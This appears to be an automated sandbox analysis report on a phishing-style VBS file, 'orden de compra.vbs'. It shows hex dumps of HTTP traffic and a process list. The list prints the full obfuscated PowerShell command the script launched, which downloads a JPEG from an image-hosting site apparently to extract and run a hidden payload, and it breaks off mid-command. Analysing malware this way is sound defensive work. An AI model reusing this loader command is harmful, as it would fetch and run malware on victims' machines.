                                                                                  2024-04-24 04:54:12 UTC1369INData Raw: f4 fe 15 5a 50 3f d2 9c d9 5a c4 f1 2f 84 5a 46 3f 88 2b 63 03 eb 40 d2 68 5d 84 4e 8f a9 70 58 32 ec 31 fc e8 7e 91 31 8b a9 99 a4 1e 66 04 00 bb 83 db 14 4d 8c 40 5a ac 52 ac b1 c9 16 57 d7 6d 8d 41 6d 6d 24 9a 02 02 a3 25 94 0e ff 00 33 41 25 eb 96 d6 c0 8f 3f 38 d8 e4 1e f4 bd dd c9 54 83 0a e4 e4 e4 e0 7c ea 76 51 14 85 a6 65 0c df 88 1a 96 d6 de 32 8c e5 86 90 db 6f 9c fe 94 13 a4 02 48 41 2c b8 55 c1 2a 0d 27 ca 6b 75 60 b9 04 90 0e c3 da ac 09 6c 44 6b 1a 6c 5b 2a 47 24 0f 5a ae cf 6d e1 de 22 e1 4e 39 d5 9c 7d 68 39 6b 34 9d 8b ae 51 7b 02 41 ac a3 ed ca ac 2b a5 57 07 7d f6 c7 d2 b2 83 d2 ae 11 55 46 0f 6e 45 2d 93 f1 02 0e 08 a6 97 d1 80 14 6b c1 f6 a1 18 01 c6 e0 0f ad 00 b2 26 a1 83 ab 18 e4 d7 76 c7 c3 1a 5b 25 49 e7 d2 bb 20 e4 8e 7d 2b 5a
                                                                                  Data Ascii: ZP?Z/ZF?+c@h]NpX21~1fM@ZRWmAmm$%3A%?8T|vQe2oHA,U*'ku`lDkl[*G$Zm"N9}h9k4Q{A+W}UFnE-k&v[%I }+Z
                                                                                  2024-04-24 04:54:12 UTC1369INData Raw: 8a ec 96 89 a7 cc 5c fe 10 30 00 0b be 6b 99 7f 69 72 1b 5a b0 19 19 0d b8 dc 71 53 f4 18 98 74 e0 c5 02 8c 67 1c d2 fb 99 a2 82 fb 0b 0a 98 cb 69 66 ce 73 9c 7f 5a 02 6e 71 31 60 a7 28 71 91 8e f4 a6 d1 26 17 71 88 5f 12 2e 7f 18 d8 8c 71 fa 53 cb 85 55 8d 64 2a 23 d8 12 73 c5 25 b7 91 fc 71 2d 9c 46 47 dc 69 e0 77 c7 e9 fc 28 25 ea 36 b1 fd dc ca f1 b4 37 20 e5 55 58 b6 4d 0b 6d d4 6e 60 b8 76 62 85 8b 79 b6 dc 91 4f ad 2d cc 6a 24 79 4c 92 be ec 48 e3 d8 7a 0a 0b e2 14 4f ba 78 8a 8a 19 9c 64 8d 8f 06 80 63 d5 0c 8a 0b a4 47 d3 e9 59 79 d4 e1 11 88 e2 4d 2c 37 d6 b9 15 1d 91 11 d8 5c 39 4c a1 2a a4 91 de ba b2 87 ef 57 07 28 1c 46 33 a5 93 48 df b7 e9 41 cd bd ce b6 47 92 77 48 4e ad 81 c6 f5 bd 71 4b 6c c0 c8 64 96 34 6f c4 7b 76 23 f9 d3 03 62 6e 70
                                                                                  Data Ascii: \0kirZqStgifsZnq1`(q&q_.qSUd*#s%q-FGiw(%67 UXMmn`vbyO-j$yLHzOxdcGYyM,7\9L*W(F3HAGwHNqKld4o{v#bnp
                                                                                  2024-04-24 04:54:12 UTC1369INData Raw: 61 8f b8 a0 2a ef e2 09 3a 8f c3 37 23 ee 46 37 82 e2 29 34 a9 25 42 9d 4a 5b 73 9e ea 0f 3d b8 e2 91 dc de 33 22 2c 41 51 ca 69 24 b7 f7 ef f9 d1 f6 70 42 9d 27 ab 4d 69 72 f2 46 62 85 5a 37 4d 24 1f 14 60 8d ce 76 a1 ec fa b5 d5 9c 1e 15 bb 47 85 39 c3 c0 8f cf fe 40 9c 50 0f 77 78 49 0e f6 b1 e6 43 82 57 3e 52 70 0f b7 03 1f 53 4b ae 25 91 22 79 22 01 57 27 4e ad fd b6 fa 0f d6 ac ff 00 10 ad bd b4 08 b1 45 a2 2b b8 21 bb 10 85 04 ab 6e 0a e7 9d 20 82 40 ce c0 d2 d9 6c e1 82 cc 1e ad 1b db 48 74 8f 03 00 ca 57 3f 88 2f ee ff 00 f5 62 83 ab 44 92 7b 75 95 da 17 43 13 15 71 26 5b 59 c0 c6 06 e3 00 9a e2 79 44 89 04 a8 55 19 8b ae 55 76 04 8d 8f e5 b7 af 7a 75 d1 ff 00 c1 ac ba 4d dc f1 da 97 b7 99 0c 2a d2 4d aa 42 cc 99 03 03 00 10 49 c8 f6 f7 de 7b ff
                                                                                  Data Ascii: a*:7#F7)4%BJ[s=3",AQi$pB'MirFbZ7M$`vG9@PwxICW>RpSK%"y"W'NE+!n @lHtW?/bD{uCq&[YyDUUvzuM*MBI{
                                                                                  2024-04-24 04:54:12 UTC1369INData Raw: cb 6f 6d 6e 90 44 9b 85 4b 6d 3f 99 c6 e7 de ad 10 75 24 95 c9 8e fa 16 02 52 14 89 82 85 f3 e7 70 4f 1a 7e 75 a8 5e e1 d3 51 b9 32 20 c0 1f b6 0d fb e0 9e fc e3 23 e4 28 3c fb e2 08 25 bb 86 e2 59 e1 65 94 9d 6c 7c 32 35 62 95 c5 75 23 dc db 2c a9 11 64 64 19 54 c7 06 bd 37 e2 a4 3f e0 ee c3 56 72 83 7f 9d 79 84 2e 8b 7e 04 a5 73 e3 ef 81 e6 3c 63 1f 5a 0d 7f 8c df 41 29 92 db ee e8 58 ea 27 c2 1f 97 cb da ba 6f 89 fa a8 4d 29 34 00 1d 88 f0 45 40 66 b4 8c 3e 10 39 19 51 91 9c fb ef b6 fb fe 54 bf c1 32 b9 f0 c6 39 38 ec 07 cf d0 50 58 ac 7e 21 ea 47 a5 bb 03 10 90 dd 2c 40 f8 60 80 19 49 c0 1f 4a 93 a9 75 9b ff 00 be 4e ac f6 e9 6e 1d e3 5d 71 82 4a 8d 8e 07 27 22 97 74 a9 62 86 34 8c 48 85 e2 bb 82 52 ec 30 31 9d 27 1e b8 c8 df 1f c2 95 dc 19 45 e4 e6
                                                                                  Data Ascii: omnDKm?u$RpO~u^Q2 #(<%Yel|25bu#,ddT7?Vry.~s<cZA)X'oM)4E@f>9QT298PX~!G,@`IJuNn]qJ'"tb4HR01'E


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.449732104.21.45.1384433744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-24 04:54:13 UTC100OUTGET /images/004/760/044/original/new_image.jpg?1711287888 HTTP/1.1
                                                                                  Host: uploaddeimagens.com.br
                                                                                  2024-04-24 04:54:13 UTC702INHTTP/1.1 200 OK
                                                                                  Date: Wed, 24 Apr 2024 04:54:13 GMT
                                                                                  Content-Type: image/jpeg
                                                                                  Content-Length: 4199045
                                                                                  Connection: close
                                                                                  Last-Modified: Sun, 24 Mar 2024 13:44:48 GMT
                                                                                  ETag: "66002e50-401285"
                                                                                  Cache-Control: max-age=2678400
                                                                                  CF-Cache-Status: REVALIDATED
                                                                                  Accept-Ranges: bytes
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kF6R0WSVoJ8YrOAvya0p3w5rMt7DTIMJ%2B%2F%2FQx%2FbcliIlPx%2FFRtnafd5lYwKxC06rOXwTXUeFthAcjEaIL%2Fh74oSSRF1SVDLvV8IPD5vhYd%2FrzQS9KqEmunji4amWHCZCdGH%2BRh5NPFpy"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 87937e7e2914dbd1-LAX
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-24 04:54:13 UTC667INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                  2024-04-24 04:54:13 UTC1369INData Raw: af 02 ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99
                                                                                  Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
                                                                                  2024-04-24 04:54:13 UTC1369INData Raw: e7 48 f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3
                                                                                  Data Ascii: HVH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg
                                                                                  2024-04-24 04:54:13 UTC1369INData Raw: 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00
                                                                                  Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a
                                                                                  2024-04-24 04:54:13 UTC1369INData Raw: d5 d7 07 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2
                                                                                  Data Ascii: >2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b
                                                                                  2024-04-24 04:54:13 UTC1369INData Raw: c3 1b 3a cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88
                                                                                  Data Ascii: :4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>i
                                                                                  2024-04-24 04:54:13 UTC1369INData Raw: f8 5a b4 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3
                                                                                  Data Ascii: Zr:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
                                                                                  2024-04-24 04:54:13 UTC1369INData Raw: 03 82 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa
                                                                                  Data Ascii: 1Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
                                                                                  2024-04-24 04:54:13 UTC1369INData Raw: 0b d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40
                                                                                  Data Ascii: lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@
                                                                                  2024-04-24 04:54:13 UTC1369INData Raw: 5a b1 de f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04
                                                                                  Data Ascii: Z@t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hC


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:06:54:06
                                                                                  Start date:24/04/2024
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs"
                                                                                  Imagebase:0x7ff63a1d0000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:06:54:08
                                                                                  Start date:24/04/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0D